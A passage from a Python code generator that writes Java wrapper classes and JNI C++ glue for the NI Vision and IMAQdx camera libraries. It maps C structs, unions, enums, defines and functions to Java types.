self.exclude_members = set(self.config_get("exclude_members", "").split(',')) self.exclude_members |= set( x.split(':')[0] for x in self.config_get("uniontype", "").split(',')) self.union_members = {} for v in self.config_get("uniontype", "").split(','): if not v: continue vl = v.split(':') self.union_members[vl[0]] = ( vl[1], [tuple(y.strip() for y in x.split('=')) for x in vl[2:]]) if sized_members is not None: self.sized_members = sized_members else: self.sized_members = dict(tuple(y.strip() for y in x.split(':')) for x in self.config_get("arraysize", "").split(',') if x) self.size_members = dict((x, None) for x in self.sized_members.values()) # get type of each sized member for fname, ftype, arr, comment in fields: if fname in self.size_members: self.size_members[fname] = ftype def config_get(self, option, fallback): return self.emit.config_get(self.name, option, fallback) def config_getboolean(self, section, option, fallback): return self.emit.config_getboolean(self.name, option, fallback) def config_struct_get(self, option): return self.emit.config_struct.get(self.name, option) def get_field_java_code(self, fname, ftype, arr, foffset, jfielddefs_private, backing="backing"): """Returns dict of fielddef, init, read, write, type """ if ftype.startswith("const"): ftype = ftype[5:].strip() if fname in self.sized_members: # Change from pointer to array if ftype[-1] == '*': ftype = ftype[:-1] arr = "" size_fname = self.sized_members[fname] size_jtype = c_to_jtype(self.size_members[size_fname], None) size_foffset = self.config_struct_get(size_fname) else: size_fname = "" size_jtype = None size_foffset = None is_pointer = False if ftype[-1] == '*' and ftype[:-1] in opaque_structs: # silently strip pointer from native structs ftype = ftype[:-1] elif ftype[-1] == '*' and (ftype, arr) not in java_types_map: # Not an array, but not inline either ftype = ftype[:-1] is_pointer = True # Hopefully the base type now jtype = c_to_jtype(ftype, arr) struct_sz = None buftype = "ByteBuffer" array_size = jtype.array_size or "" jaccessor = (None, None, None, None, None) writeBufs = [] backingRead = [] read = [] write = [] backingWrite = [] construct = [] toArg = "" typeemit = None if jtype.jni_sig == "[Ljava/lang/String;": # null-terminated strings if size_fname: jaccessor = java_accessor_map[size_jtype.jni_sig[0]] typeemit = strzArrayEmitSized else: typeemit = strzArrayEmitUnsized elif jtype.jni_sig[0] == '[': if is_pointer: raise NotImplementedError("pointer to array") if arr: construct.append("{fname} = new {ftype_one}[%s];" % arr) if jtype.is_opaque or jtype.is_enum: raise NotImplementedError("array of opaque and enum not implemented") elif jtype.is_struct: struct_sz = self.emit.config_struct.get(jtype.j_type[:-2], "_SIZE_") construct.extend((""" for (int i=0, off={foffset}; i<%s; i++, off += {struct_sz}) {fname}[i] = new {ftype_one}({backing}, off);""" % arr).split('\n')) read.extend(("""for ({ftype_one} it : {fname}) {{ it.read(); }}""").split('\n')) write.extend(("""for ({ftype_one} it : {fname}) {{ it.write(); }}""").split('\n')) else: raise NotImplementedError("sized array of unknown type") else: jaccessor = java_accessor_map[size_jtype.jni_sig[0]] if jtype.is_enum: typeemit = enumArrayEmit elif jtype.is_opaque: typeemit = opaqueArrayEmit elif ftype == "String255": typeemit = string255ArrayEmit elif jtype.is_struct: struct_sz = self.emit.config_struct.get(jtype.j_type[:-2], "_SIZE_") typeemit = structArrayEmit elif jtype.jni_sig[1] == 'B': typeemit = byteArrayEmit elif jtype.jni_sig[1] in java_accessor_map: buftype = "%sBuffer" % java_accessor_map[jtype.jni_sig[1]][0] struct_sz = java_size_map[jtype.jni_sig[1]] typeemit = jtypeArrayEmit else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) elif jtype.is_enum: if is_pointer: raise NotImplementedError("pointer to enum") typeemit = enumEmit elif jtype.is_opaque or (jtype.is_struct and is_pointer): typeemit = opaqueEmit elif jtype.is_struct: typeemit = structEmit elif jtype.jni_sig[0] in java_accessor_map: if is_pointer: raise NotImplementedError("pointer to raw") jaccessor = java_accessor_map[jtype.jni_sig[0]] typeemit = jtypeEmit elif jtype.jni_sig == "Ljava/lang/String;": if is_pointer: raise NotImplementedError("pointer to string") if jtype.string_array: typeemit = strSizedEmit else: typeemit = strzEmit else: raise ValueError("unrecognized jni signature '%s'" % jtype.jni_sig) if typeemit is not None: writeBufs.extend(typeemit.writeBufs) construct.extend(typeemit.construct) backingRead.extend(typeemit.backingRead) read.extend(typeemit.read) write.extend(typeemit.write) backingWrite.extend(typeemit.backingWrite) toArg = typeemit.toArg for buf in writeBufs: jfielddefs_private.append("private %s;" % buf.format(buftype=buftype, fname=fname)) jfielddef = 'public %s %s;' % (jtype.j_type, fname) fargs = dict(fname=fname, ftype=jtype.j_type, ftype_one=jtype.j_type[:-2], foffset=foffset, size_fname=fname + "_" + size_fname, size_foffset=size_foffset, pointer_sz=self.emit.config_struct.get("_platform_", "pointer"), struct_sz=struct_sz, array_size=array_size, buftype=buftype, jaccessor=jaccessor[0], jaccessor_cast_out_pre=jaccessor[1], jaccessor_cast_out_post=jaccessor[2], jaccessor_cast_in_pre=jaccessor[3], jaccessor_cast_in_post=jaccessor[4], backing=backing) jconstruct = [x.format(**fargs) for x in construct] jwritebufs = [x.format(**fargs) for x in writeBufs] jbackingread = [x.format(**fargs) for x in backingRead] jread = [x.format(**fargs) for x in read] jwrite = [x.format(**fargs) for x in write] jbackingwrite = [x.format(**fargs) for x in backingWrite] jtoarg = toArg.format(**fargs) return dict(fielddef=jfielddef, construct=jconstruct, write_bufs=jwritebufs, backing_read=jbackingread, read=jread, write=jwrite, backing_write=jbackingwrite, to_arg=jtoarg, type=jtype, is_pointer=is_pointer, arr=arr, size_fname=size_fname, size_jtype=size_jtype, size_foffset=size_foffset) def get_java_code(self): jcargs = [] jcinit = [] jfielddefs = [] jfielddefs_private = [] jconstruct = [] jread = [] jwrite = [] # standard struct fields for fname, ftype, arr, comment in self.fields: if fname in self.size_members or fname in self.exclude_members: continue # don't emit if ":" in fname: continue # TODO: bit field foffset = self.config_struct_get(fname) field = self.get_field_java_code(fname, ftype, arr, foffset, jfielddefs_private) # XXX: hack to get short and float to work reasonably if field["type"].j_type == "short": jcargs.append("int {fname}".format(fname=fname)) jcinit.append("this.{fname} = (short){fname};".format(fname=fname)) elif field["type"].j_type == "float": jcargs.append("double {fname}".format(fname=fname)) jcinit.append("this.{fname} = (float){fname};".format(fname=fname)) else: jcargs.append("{ftype} {fname}".format(ftype=field["type"].j_type, fname=fname)) jcinit.append("this.{fname} = {fname};".format(fname=fname)) fielddef = field["fielddef"] if comment is not None: fielddef += ' // %s' % comment jfielddefs.append(fielddef) jconstruct.extend(field["construct"]) jread.extend(field["backing_read"]) jread.extend(field["read"]) jwrite.extend(field["write"]) jwrite.extend(field["backing_write"]) # typed union fields jfielddefs_union_private = [] for union_name, (switchvalue_name, members) in self.union_members.items(): # get union structure name and type info for fname, ftype, arr, comment in self.fields: if fname == union_name: union_ftype = ftype elif fname == switchvalue_name: switchvalue_ftype = ftype unionfields = self.emit.unions[union_ftype] # build map of union fields for faster lookup ufieldmap = {} for fname, ftype, arr, comment in unionfields: ufieldmap[fname] = (ftype, arr, comment) # common offset foffset = self.config_struct_get(union_name) for enumval, fname in members: # find the rest of the info from the union fields ftype, arr, comment = ufieldmap[fname] field = self.get_field_java_code(fname, ftype, arr, foffset, jfielddefs_union_private) fielddef = field["fielddef"] read = field["backing_read"] read.extend(field["read"]) write = field["write"] write.extend(field["backing_write"]) if comment is not None: fielddef += ' // %s' % comment jfielddefs.append(fielddef) jconstruct.extend(field["construct"]) if enumval.startswith("IMAQ_"): enumval = enumval[5:] ifcheck = "if (%s == %s.%s) " % (switchvalue_name, switchvalue_ftype, enumval) if len(read[0]) > 0 and read[0][0] == '{': read[0] = ifcheck + read[0] else: read = (" " + "\n ".join(read)).split('\n') read.insert(0, ifcheck + "{") read.append("}") if len(write[0]) > 0 and write[0][0] == '{': write[0] = ifcheck + write[0] else: write = (" " + "\n ".join(write)).split('\n') write.insert(0, ifcheck + "{") write.append("}") jread.extend(read) jwrite.extend(write) jfielddefs.extend(jfielddefs_private) # Java definition p1 = """ public static class {name} extends DisposedStruct {{ {jfielddefs} private void init() {{ {jconstruct} }} public {name}() {{ super({size}); init(); }}""" if jcargs: p2 = """ public {name}({jcargs}) {{ super({size}); {jcinit} }}""" else: p2 = "" p3 = """ protected {name}(ByteBuffer backing, int offset) {{ super(backing, offset, {size}); init(); }} protected {name}(long nativeObj, boolean owned) {{ super(nativeObj, owned, {size}); init(); }} protected void setBuffer(ByteBuffer backing, int offset) {{ super.setBuffer(backing, offset, {size}); }} public void read() {{ {jread} }} public void write() {{ {jwrite} }} public int size() {{ return {size}; }} }}""" return "".join([p1, p2, p3]).format( name=self.name, jfielddefs="\n ".join(jfielddefs), jread="\n ".join(jread), jwrite="\n ".join(jwrite), jconstruct="\n ".join(jconstruct), jcargs=", ".join(jcargs), jcinit="\n ".join(jcinit), size=self.config_struct_get("_SIZE_")) class JavaEmitter: def __init__(self, outdir, config, config_struct, library_funcs): self.outdir = outdir self.config = config self.config_struct = config_struct self.library_funcs = library_funcs self.package = "com.ni.vision" self.classname = "NIVision" self.classpath = self.package.replace(".", "/") + "/" + self.classname self.unions = {} self.errors = {} with open(os.path.join(outdir, "VisionException.java"), "wt") as f: print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! // package {package}; public class VisionException extends RuntimeException {{ private static final long serialVersionUID = 1L; public VisionException(String msg) {{ super(msg); }} @Override public String toString() {{ return "VisionException [" + super.toString() + "]"; }} }}""".format(package=self.package), file=f) self.out = open(os.path.join(outdir, "NIVision.java"), "wt") print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! // package {package}; import java.lang.reflect.*; import java.io.UnsupportedEncodingException; import java.nio.Buffer; import java.nio.ByteBuffer; import java.nio.ByteOrder; public class {classname} {{ private {classname}() {{}} private static native void imaqDispose(long addr); private static Constructor<?> constructDirectByteBuffer; private static Field bufferAddressField; static {{ try {{ Class<?>[] cArg = new Class[2]; cArg[0] = long.class; cArg[1] = int.class; constructDirectByteBuffer = Class.forName("java.nio.DirectByteBuffer").getDeclaredConstructor(cArg); constructDirectByteBuffer.setAccessible(true); bufferAddressField = Buffer.class.getDeclaredField("address"); bufferAddressField.setAccessible(true); }} catch (ReflectiveOperationException e) {{ throw new ExceptionInInitializerError(e); }} }} private static ByteBuffer newDirectByteBuffer(long addr, int cap) {{ try {{ return ((ByteBuffer)(constructDirectByteBuffer.newInstance(addr, cap))).order(ByteOrder.nativeOrder()); }} catch (ReflectiveOperationException e) {{ throw new ExceptionInInitializerError(e); }} }} private static long getByteBufferAddress(ByteBuffer bb) {{ try {{ return bufferAddressField.getLong(bb); }} catch (IllegalAccessException e) {{ return 0; }} }} public static ByteBuffer sliceByteBuffer(ByteBuffer bb, int offset, int size) {{ int pos = bb.position(); int lim = bb.limit(); bb.position(offset); bb.limit(offset+size); ByteBuffer new_bb = bb.slice().order(ByteOrder.nativeOrder()); bb.position(pos); bb.limit(lim); return new_bb; }} public static ByteBuffer getBytes(ByteBuffer bb, byte[] dst, int offset, int size) {{ int pos = bb.position(); bb.position(offset); bb.get(dst, 0, size); bb.position(pos); return bb; }} public static ByteBuffer putBytes(ByteBuffer bb, byte[] src, int offset, int size) {{ int pos = bb.position(); bb.position(offset); bb.put(src, 0, size); bb.position(pos); return bb; }} private static abstract class DisposedStruct {{ protected ByteBuffer backing; private boolean owned; protected DisposedStruct(int size) {{ backing = ByteBuffer.allocateDirect(size); backing.order(ByteOrder.nativeOrder()); owned = false; }} protected DisposedStruct(ByteBuffer backing, int offset, int size) {{ this.backing = sliceByteBuffer(backing, offset, size); owned = false; }} private DisposedStruct(long nativeObj, boolean owned, int size) {{ backing = newDirectByteBuffer(nativeObj, size); this.owned = owned; }} public void free() {{ if (owned) {{ imaqDispose(getByteBufferAddress(backing)); owned = false; backing = null; }} }} @Override protected void finalize() throws Throwable {{ if (owned) imaqDispose(getByteBufferAddress(backing)); super.finalize(); }} public long getAddress() {{ if (backing == null) return 0; write(); return getByteBufferAddress(backing); }} protected void setBuffer(ByteBuffer backing, int offset, int size) {{ this.backing = sliceByteBuffer(backing, offset, size); }} abstract public void read(); abstract public void write(); abstract public int size(); }} private static abstract class OpaqueStruct {{ private long nativeObj; private boolean owned; protected OpaqueStruct() {{ nativeObj = 0; owned = false; }} protected OpaqueStruct(long nativeObj, boolean owned) {{ this.nativeObj = nativeObj; this.owned = owned; }} public void free() {{ if (owned && nativeObj != 0) {{ imaqDispose(nativeObj); owned = false; nativeObj = 0; }} }} @Override protected void finalize() throws Throwable {{ if (owned && nativeObj != 0) imaqDispose(nativeObj); super.finalize(); }} public long getAddress() {{ return nativeObj; }} }} public static class RawData {{ private ByteBuffer buf; private boolean owned; public RawData() {{ owned = false; }} public RawData(ByteBuffer buf) {{ this.buf = buf; owned = false; }} private RawData(long nativeObj, boolean owned, int size) {{ buf = newDirectByteBuffer(nativeObj, size); this.owned = owned; }} public void free() {{ if (owned) {{ imaqDispose(getByteBufferAddress(buf)); owned = false; buf = null; }} }} @Override protected void finalize() throws Throwable {{ if (owned) imaqDispose(getByteBufferAddress(buf)); super.finalize(); }} public long getAddress() {{ if (buf == null) return 0; return getByteBufferAddress(buf); }} public ByteBuffer getBuffer() {{ return buf; }} public void setBuffer(ByteBuffer buf) {{ if (owned) free(); this.buf = buf; }} }}""".format(package=self.package, classname=self.classname), file=self.out) if int(self.config_struct.get("_platform_", "pointer")) == 4: # 32-bit addressing java_types_map[("size_t", None)] = JavaType("int", "int", "jint", "I") print(""" private static long getPointer(ByteBuffer bb, int offset) { return (long)bb.getInt(offset); } private static void putPointer(ByteBuffer bb, int offset, long address) { bb.putInt(offset, (int)address); } private static void putPointer(ByteBuffer bb, int offset, ByteBuffer buf) { if (buf == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)getByteBufferAddress(buf)); } private static void putPointer(ByteBuffer bb, int offset, DisposedStruct struct) { if (struct == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)struct.getAddress()); } private static void putPointer(ByteBuffer bb, int offset, OpaqueStruct struct) { if (struct == null) bb.putInt(offset, 0); else bb.putInt(offset, (int)struct.getAddress()); }""", file=self.out) else: # 64-bit addressing java_types_map[("size_t", None)] = JavaType("long", "long", "jlong", "J") print(""" private static long getPointer(ByteBuffer bb, int offset) { return bb.getLong(offset); } private static void putPointer(ByteBuffer bb, int offset, long address) { bb.putLong(offset, address); } private static void putPointer(ByteBuffer bb, int offset, ByteBuffer buf) { if (buf == null) bb.putLong(offset, 0); else bb.putLong(offset, getByteBufferAddress(buf)); } private static void putPointer(ByteBuffer bb, int offset, OpaqueStruct struct) { if (struct == null) bb.putLong(offset, 0); else bb.putLong(offset, struct.getAddress()); } private static void putPointer(ByteBuffer bb, int offset, DisposedStruct struct) { if (struct == null) bb.putLong(offset, 0); else bb.putLong(offset, struct.getAddress()); }""", file=self.out) self.outc = open(os.path.join(outdir, "NIVision.cpp"), "wt") print("""// // This file is auto-generated by wpilibj/wpilibJavaJNI/nivision/gen_java.py // Please do not edit! // #include <stdlib.h> #include <string.h> #include <assert.h> #include <jni.h> #include <nivision.h> #include <NIIMAQdx.h> static const char* getErrorText(int err); // throw java exception static void throwJavaException(JNIEnv *env) {{ jclass je = env->FindClass("{packagepath}/VisionException"); int err = imaqGetLastError(); const char* err_text = getErrorText(err); char* full_err_msg = static_cast<char*>(malloc(30+strlen(err_text))); sprintf(full_err_msg, "imaqError: %d: %s", err, err_text); env->ThrowNew(je, full_err_msg); free(full_err_msg); }} // throw IMAQdx java exception static void dxthrowJavaException(JNIEnv *env, IMAQdxError err) {{ jclass je = env->FindClass("{packagepath}/VisionException"); const char* err_text = getErrorText(err); char* full_err_msg = static_cast<char*>(malloc(30+strlen(err_text))); sprintf(full_err_msg, "IMAQdxError: %d: %s", err, err_text); env->ThrowNew(je, full_err_msg); free(full_err_msg); }} extern "C" {{ JNIEXPORT void JNICALL Java_{package}_{classname}_imaqDispose(JNIEnv* , jclass , jlong addr) {{ imaqDispose((void*)addr); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeString(IMAQdxSession id, const char* name, char value[IMAQDX_MAX_API_STRING_LENGTH]) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeString, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeEnum(IMAQdxSession id, const char* name, IMAQdxEnumItem* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeEnumItem, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeBool(IMAQdxSession id, const char* name, bool32* value) {{ return IMAQdxGetAttribute(id, name, IMAQdxValueTypeBool, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMinimumF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeMinimum(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeMaximumF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeMaximum(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementU32(IMAQdxSession id, const char* name, uInt32* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeU32, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementI64(IMAQdxSession id, const char* name, Int64* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeI64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxGetAttributeIncrementF64(IMAQdxSession id, const char* name, float64* value) {{ return IMAQdxGetAttributeIncrement(id, name, IMAQdxValueTypeF64, (void*)value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeU32(IMAQdxSession id, const char* name, uInt32 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeU32, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeI64(IMAQdxSession id, const char* name, Int64 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeI64, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeF64(IMAQdxSession id, const char* name, float64 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeF64, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeString(IMAQdxSession id, const char* name, const char* value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeString, value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeEnum(IMAQdxSession id, const char* name, const IMAQdxEnumItem* value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeU32, value->Value); }} static inline IMAQdxError NI_FUNC IMAQdxSetAttributeBool(IMAQdxSession id, const char* name, bool32 value) {{ return IMAQdxSetAttribute(id, name, IMAQdxValueTypeBool, value); }} """.format(packagepath=self.package.replace(".", "/"), package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) self.block_comment("Opaque Structures") for name in sorted(opaque_structs): self.opaque_struct(name) def finish(self): print("}", file=self.out) print("""}} static const char* getErrorText(int err) {{ switch (err) {{ {errs} default: return "Unknown error"; }} }}""".format(errs="\n ".join( 'case %s: return "%s";' % (x, self.errors[x]) for x in sorted(self.errors))), file=self.outc) def config_get(self, section, option, fallback): try: return self.config.get(section, option) except (ValueError, configparser.NoSectionError, configparser.NoOptionError): return fallback def config_getboolean(self, section, option, fallback): try: return self.config.getboolean(section, option) except (ValueError, configparser.NoSectionError, configparser.NoOptionError): return fallback def block_comment(self, comment): print(""" /** * {comment} */""".format(comment=comment), file=self.out) print(""" /* * {comment} */""".format(comment=comment), file=self.outc) def opaque_struct(self, name): print(""" public static class {name} extends OpaqueStruct {{ private {name}() {{}} private {name}(long nativeObj, boolean owned) {{ super(nativeObj, owned); }} }}""".format(name=name), file=self.out) def define(self, name, value, comment): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return clean = None type = None after_struct = False if value == "TRUE": clean = "true" type = "boolean" elif value == "FALSE": clean = "false" type = "boolean" elif name.startswith("IMAQ_INIT_RGB") and value[0] == '{' and value[-1] == '}': return elif value.startswith("imaqMake"): clean = "new " + value[8:] type = value.split("(")[0][8:] after_struct = True elif value[0] == '"': if len(value) == 2: clean = "{ 0 }" else: clean = "{ %s,0 }" % ",".join("0x%x" % ord(c) for c in value[1:-1]) type = "byte[]" elif number_re.match(value): clean = value type = "int" elif constant_re.match(value): clean = value after_struct = value not in defined if clean is None: print("Invalid #define: %s" % name) return if name.startswith("ERR_"): self.errors[name] = comment return # strip IMAQ_ prefix if name.startswith("IMAQ_"): name = name[5:] code = " public static final {type} {name} = {value};" \ .format(type=type, name=name, value=clean) if after_struct: define_after_struct.append((name, code)) return print(code, file=self.out) defined.add(name) def text(self, text): print(text, file=self.out) def static_const(self, name, ctype, value): # strip IMAQ_ prefix if name.startswith("IMAQ_"): name = name[5:] if hasattr(value, "__iter__"): code = " public static final {ctype} {name} = new {ctype}({value});" value = ", ".join(value) else: code = "{name} = {value};" print(code.format(name=name, value=value, ctype=ctype), file=self.out) defined.add(name) def enum(self, name, values): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return valuestrs = [] need_search = False prev_value = -1 for vname, value, comment in values: if vname.endswith("SIZE_GUARD"): continue if value is None: # auto-increment value = "%d" % (prev_value + 1) value_i = int(value, 0) if value_i < 0 or value_i != (prev_value + 1): # need to do search instead of index for fromValue() need_search = True prev_value = value_i if vname == "IMAQdxErrorSuccess": continue if vname.startswith("IMAQdxError"): self.errors[vname] = comment continue if vname.startswith("IMAQ_"): vname = vname[5:] if vname.startswith("IMAQdx"): vname = vname[6:] if vname[0] in "0123456789": vname = "C" + vname valuestrs.append("%s(%s),%s" % (vname, value, " // %s" % comment if comment else "")) defined.add(vname) if not valuestrs: return print(""" public static enum {name} {{ {values} ; private final int value; private {name}(int value) {{ this.value = value; }} public static {name} fromValue(int val) {{""".format(name=name, values="\n ".join(valuestrs)), file=self.out) if need_search: print(""" for ({name} v : values()) {{ if (v.value == val) return v; }} return null;""".format(name=name), file=self.out) else: print(""" try {{ return values()[val]; }} catch (ArrayIndexOutOfBoundsException e) {{ return null; }}""".format(), file=self.out) print(""" }} public int getValue() {{ return value; }} }}""".format(), file=self.out) defined.add(name) enums.add(name) def typedef(self, name, typedef, arr): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return if typedef.startswith("struct"): return elif typedef.startswith("union"): return elif (name, arr) not in java_types_map: java_types_map[(name, arr)] = c_to_jtype(typedef, arr).copy() if arr is None: java_types_map[(name, "")] = c_to_jtype(typedef, "").copy() defined.add(name) def typedef_function(self, name, restype, params): if self.config_getboolean(name, "exclude", fallback=False): return if name in opaque_structs: return raise NotImplementedError("typedef function not implemented") def function(self, name, restype, params): if name not in self.library_funcs: return if name == "IMAQdxEnumerateVideoModes": # full custom code print(""" public static class dxEnumerateVideoModesResult {{ public IMAQdxEnumItem[] videoModeArray; public int currentMode; private ByteBuffer videoModeArray_buf; private dxEnumerateVideoModesResult(ByteBuffer rv_buf, ByteBuffer videoModeArray_buf) {{ this.videoModeArray_buf = videoModeArray_buf; int count = rv_buf.getInt(0); videoModeArray = new IMAQdxEnumItem[count]; for (int i=0, off=0; i<count; i++, off += {struct_sz}) {{ videoModeArray[i] = new IMAQdxEnumItem(videoModeArray_buf, off); videoModeArray[i].read(); }} currentMode = rv_buf.getInt(8); }} }} public static dxEnumerateVideoModesResult IMAQdxEnumerateVideoModes(int id) {{ ByteBuffer rv_buf = ByteBuffer.allocateDirect(8+8).order(ByteOrder.nativeOrder()); long rv_addr = getByteBufferAddress(rv_buf); _IMAQdxEnumerateVideoModes(id, 0, rv_addr+0, rv_addr+8); int count = rv_buf.getInt(0); ByteBuffer videoModeArray_buf = ByteBuffer.allocateDirect(count*{struct_sz}).order(ByteOrder.nativeOrder()); _IMAQdxEnumerateVideoModes(id, getByteBufferAddress(videoModeArray_buf), rv_addr+0, rv_addr+8); dxEnumerateVideoModesResult rv = new dxEnumerateVideoModesResult(rv_buf, videoModeArray_buf); return rv; }} private static native void _IMAQdxEnumerateVideoModes(int id, long videoModeArray, long count, long currentMode);""".format( struct_sz=self.config_struct.get("IMAQdxEnumItem", "_SIZE_")), file=self.out) print(""" JNIEXPORT void JNICALL Java_{package}_{classname}__1IMAQdxEnumerateVideoModes(JNIEnv* env, jclass , jint id, jlong videoModeArray, jlong count, jlong currentMode) {{ IMAQdxError rv = IMAQdxEnumerateVideoModes((IMAQdxSession)id, (IMAQdxVideoMode*)videoModeArray, (uInt32*)count, (uInt32*)currentMode); if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv); }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) return elif name == "IMAQdxGetImageData": print(""" public static int IMAQdxGetImageData(int id, ByteBuffer buffer, IMAQdxBufferNumberMode mode, int desiredBufferNumber) {{ long buffer_addr = getByteBufferAddress(buffer); int buffer_size = buffer.capacity(); return _IMAQdxGetImageData(id, buffer_addr, buffer_size, mode.getValue(), desiredBufferNumber); }} private static native int _IMAQdxGetImageData(int id, long buffer, int bufferSize, int mode, int desiredBufferNumber);""".format(), file=self.out) print(""" JNIEXPORT jint JNICALL Java_{package}_{classname}__1IMAQdxGetImageData(JNIEnv* env, jclass , jint id, jlong buffer, jint bufferSize, jint mode, jint desiredBufferNumber) {{ uInt32 actualBufferNumber; IMAQdxError rv = IMAQdxGetImageData((IMAQdxSession)id, (void*)buffer, (uInt32)bufferSize, (IMAQdxBufferNumberMode)mode, (uInt32)desiredBufferNumber, &actualBufferNumber); if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv); return (jint)actualBufferNumber; }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) elif name == "imaqReadFile": print(""" public static void imaqReadFile(Image image, String fileName) {{ ByteBuffer fileName_buf; byte[] fileName_bytes; try {{ fileName_bytes = fileName.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ fileName_bytes = new byte[0]; }} fileName_buf = ByteBuffer.allocateDirect(fileName_bytes.length+1); putBytes(fileName_buf, fileName_bytes, 0, fileName_bytes.length).put(fileName_bytes.length, (byte)0); _imaqReadFile(image.getAddress(), getByteBufferAddress(fileName_buf), 0, 0); }} private static native void _imaqReadFile(long image, long fileName, long colorTable, long numColors);""".format(), file=self.out) print(""" JNIEXPORT void JNICALL Java_{package}_{classname}__1imaqReadFile(JNIEnv* env, jclass , jlong image, jlong fileName, jlong colorTable, jlong numColors) {{ int rv = imaqReadFile((Image*)image, (const char*)fileName, (RGBValue*)colorTable, (int*)numColors); if (rv == 0) throwJavaException(env); }}""".format(package=self.package.replace(".", "_"), classname=self.classname), file=self.outc) return if self.config_getboolean(name, "exclude", fallback=False): return # common return cases retpointer = self.config_getboolean(name, "rvdisposed", fallback=False) j_funcargs = [] jn_funcargs = [] jni_funcargs = [("env", java_types_map["env", None]), ("", java_types_map["cls", None])] jn_passedargs = {} paramtypes = {} jinit = [] jfini = [] exceptioncheck = "" retc = "" jretc = "" if restype == "int": functype = "STDFUNC" rettype = c_to_jtype("void", None) exceptioncheck = "if (rv == 0) throwJavaException(env);" elif restype == "IMAQdxError": functype = "STDFUNC" rettype = c_to_jtype("void", None) exceptioncheck = "if (rv != IMAQdxErrorSuccess) dxthrowJavaException(env, rv);" else: if restype[-1] == "*": functype = "STDPTRFUNC" exceptioncheck = "if (!rv) throwJavaException(env);" else: functype = "RETFUNC" if restype[-1] == "*" and restype[:-1] in opaque_structs: # silently strip pointer from native structs rettype = c_to_jtype(restype[:-1], None) else: rettype = c_to_jtype(restype, None) # TODO: defaults # defaults = dict((y.strip() for y in x.split(':')) for x in # self.config_get(name, "defaults", "").split(',') if x) sized_params = dict(tuple(y.strip() for y in x.split(':')) for x in self.config_get(name, "arraysize", "").split(',') if x) size_params = set(sized_params.values()) inparams = [x.strip() for x in self.config_get(name, "inparams", "").split(',') if x.strip()] outparams = [x.strip() for x in self.config_get(name, "outparams", "").split(',') if x.strip()] nullokparams = [x.strip() for x in self.config_get(name, "nullok", "").split(',') if x.strip()] # guess additional output parameters for pname, ptype, arr in params: if (pname not in inparams and pname not in outparams and pname not in sized_params and ptype and not ptype.startswith("const") and ptype[:-1] not in opaque_structs and ptype[-1] == "*"): outparams.append(pname) retarraysize = self.config_get(name, "retarraysize", "").strip() if retarraysize: size_params.add(retarraysize) # rettype = c_to_jtype(restype, "") if retarraysize not in outparams: outparams.append(retarraysize) retsize = self.config_get(name, "retsize", "").strip() if retsize: size_params.add(retsize) if 